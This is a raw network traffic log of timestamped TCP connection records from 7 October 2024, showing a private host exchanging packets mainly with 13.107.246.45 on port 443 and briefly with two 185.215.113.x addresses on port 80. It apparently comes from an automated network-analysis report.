                                                                                                                                      Oct 7, 2024 03:23:35.805811882 CEST4436113713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.831476927 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.847551107 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.850497961 CEST61139443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.850537062 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.851054907 CEST61139443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.851062059 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.851376057 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.851475954 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.851782084 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.851797104 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.859144926 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.859637976 CEST61138443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.859652996 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.860424042 CEST61138443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.860429049 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.904699087 CEST4436113713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.905023098 CEST4436113713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.905072927 CEST61137443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.909862995 CEST61137443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.909874916 CEST4436113713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.909883022 CEST61137443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.909887075 CEST4436113713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.934470892 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.934504986 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.934886932 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.945638895 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.946374893 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.946424961 CEST61139443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.946760893 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.946830034 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.946897030 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.946919918 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.946950912 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.947005033 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.962718964 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.962811947 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.962886095 CEST61138443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.962898016 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.962928057 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.963154078 CEST61138443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.964745998 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.964768887 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.964837074 CEST61138443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.964844942 CEST4436113813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.991669893 CEST61139443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.991683960 CEST4436113913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.993702888 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.993702888 CEST61140443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:35.993735075 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:35.993758917 CEST4436114013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.010160923 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.010191917 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.010261059 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.012063980 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.012106895 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.012192965 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.013431072 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.013467073 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.013606071 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.093565941 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.093605042 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.093754053 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.093837023 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.094666004 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.094690084 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.274410009 CEST6113280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:36.274688005 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:36.279573917 CEST8061145185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.279694080 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:36.279745102 CEST8061132185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.279802084 CEST6113280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:36.279851913 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:36.284591913 CEST8061145185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.379163027 CEST6113180192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:36.633846045 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.639066935 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.648582935 CEST61126443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.648622990 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.649326086 CEST61126443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.649353027 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.650198936 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.650216103 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.651114941 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.651119947 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.737380981 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.744909048 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.744982004 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.745089054 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.745182037 CEST61126443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.752105951 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.752171993 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.754626989 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.754708052 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.781768084 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.784111023 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.784116983 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.787586927 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.787595987 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.787880898 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.787940979 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.788085938 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.788589954 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.788604021 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.788821936 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.788846016 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.789171934 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.789179087 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.789853096 CEST61126443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.789877892 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.789892912 CEST61126443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.789900064 CEST4436112613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.791620016 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.791620016 CEST61141443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.791635036 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.791644096 CEST4436114113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.802966118 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.802989960 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.803075075 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.803214073 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.803225994 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.804172039 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.804220915 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.804318905 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.804543018 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.804563999 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.882360935 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.882690907 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.882755995 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.882853031 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.882853031 CEST61142443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.882867098 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.882874966 CEST4436114213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.885437965 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.885482073 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.885554075 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.885720968 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.885750055 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.886826038 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.887233973 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.887285948 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.887291908 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.887335062 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.887414932 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.887414932 CEST61143443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.887448072 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.887476921 CEST4436114313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.889554024 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.889610052 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.889765024 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.889908075 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.889940977 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.893420935 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.893553019 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.893621922 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.893738985 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.893739939 CEST61144443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.893762112 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.893771887 CEST4436114413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.896219015 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.896243095 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.896492958 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.896625996 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:36.896651983 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.983124971 CEST8061145185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:36.983408928 CEST6114580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:37.439863920 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.441591978 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.441612959 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.441956997 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.441962004 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.483223915 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.493279934 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.493315935 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.493865013 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.493870974 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.538578987 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.538635969 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.538815022 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.540400982 CEST61146443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.540415049 CEST4436114613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.549890041 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.554083109 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.554142952 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.554513931 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.554527998 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.562216043 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.562581062 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.562660933 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.562822104 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.562846899 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.562863111 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.563453913 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.563466072 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.563802958 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.564414978 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.564456940 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.564805984 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.564817905 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.565165043 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.565191984 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.595133066 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.595201015 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.595316887 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.595730066 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.595748901 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.595760107 CEST61147443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.595766068 CEST4436114713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.598683119 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.598715067 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.598771095 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.599303007 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.599317074 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.653316021 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.653382063 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.653451920 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.653903008 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.653947115 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.653975964 CEST61149443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.653991938 CEST4436114913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.656141996 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.656181097 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.656244993 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.656377077 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.656397104 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.663865089 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.663913012 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.664093971 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.664170980 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.664217949 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.664282084 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.664333105 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.664333105 CEST61150443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.664365053 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.664387941 CEST4436115013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.666155100 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.666198015 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.666337967 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.666481972 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.666512012 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667546988 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667597055 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667665005 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.667701006 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667736053 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667814016 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.667853117 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667881966 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.667881966 CEST61148443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.667901993 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.667920113 CEST4436114813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.670449972 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.670484066 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:37.670701981 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.670838118 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:37.670866013 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.199276924 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.199764967 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.199807882 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.200232029 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.200247049 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.279248953 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.279755116 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.279788017 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.280288935 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.280299902 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.289968967 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.290313959 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.290374041 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.290731907 CEST61153443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.290746927 CEST4436115313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.301000118 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.301017046 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.301064968 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.301085949 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.301126957 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.301332951 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.301368952 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.301412106 CEST61151443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.301426888 CEST4436115113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.304042101 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.304085016 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.304344893 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.304506063 CEST61156443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.304517031 CEST4436115613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.345720053 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.346117020 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.346139908 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.346535921 CEST61155443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.346548080 CEST4436115513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.351169109 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.351521015 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.351582050 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.351986885 CEST61154443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.352041960 CEST4436115413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.385334969 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.385387897 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.385509014 CEST4436115213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:38.385550976 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.385590076 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.385628939 CEST61152443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:38.385658979 CEST4436115213.107.246.45192.168.2.4
